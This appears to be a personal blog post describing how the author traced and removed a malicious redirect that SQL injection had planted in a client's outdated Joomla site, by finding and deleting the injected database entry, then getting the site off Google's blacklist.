A client of mine contacted me to let me know they received an email from the google quality search team that found malicious code inside their joomla website. The website was running Joomla 1.0.15 and had been attacked by an SQL injection using a deprecated form script to exploit. Here is how i traced the source and fixed the problem.

Firstly the thing that triggered concern was when the site was viewed through internet explorer. The little yellow bar popped up that notifies the user that an active X install is about to be performed. There should be no scripts that requires this on the web page. Obviously firefox was not affected. The redirection path only flashed up in the IE browser status bar (bottom left) for a second so i used the 'print screen' button on the keyboard during that second to capture the screen image. I then opened up an image editor and pasted the resulting clipboard screen dump into it. From there i wrote down the address of the invading website and ran a whois search on the ip address obtained which led to a provincial area in China. I notified the owners (prob of little effect) and copied the path that i was being redirected to notepad.

route: 61.155.0.0/16
descr: CHINANET jiangsu province network
country: CN
origin: AS23650
mnt-by: MAINT-CHINANET-JS
changed: 20030414
source: APNIC

The email from google stated that malware was used and the site had been blacklisted but was otherwise unhelpful as it stemmed from a 'noreply' address. Until such time as i removed the offending code ... google would continue to blacklist me and notify users that the website was infected. Not good. Inside joomla i downloaded a SQL dump file and opened it up in wordpad. I knew the path i was being redirected to (wp-stat.html) so i let wordpad search for the term 'wp-stat' which it found an entry for as shown. Click the image to enlarge it.

You can see (well not quite here) the entry was made into the 'jos_modules' table. I have a database manager installed in Joomla so i now simply had to open it and click on the _modules table and remove the offending entry. After this was done i no longer received the active X prompt in internet explorer and antivirus (AVG only) no longer complained. Now i simply had to submit a review to google analytics and they would remove me from the black list. This was done through googles nicely designed 'webmaster tools'.

One of the negatives of using older scripts within websites is the exploits that are being developed daily.I am often asked why people bother hacking. Hacking is addictive ... and hackers are by nature inquisitive and addictive people. Imagine you had trained in Kung Fu all your life and you knew you were good. All that knowledge is great but it is useless unless applied. Hackers apply their knowledge by hacking, just like a boxer boxes and a mechanic fixes cars. Such skill could certainly be focussed elsewhere however the adrenalin and excitement of breaching a system is very luring.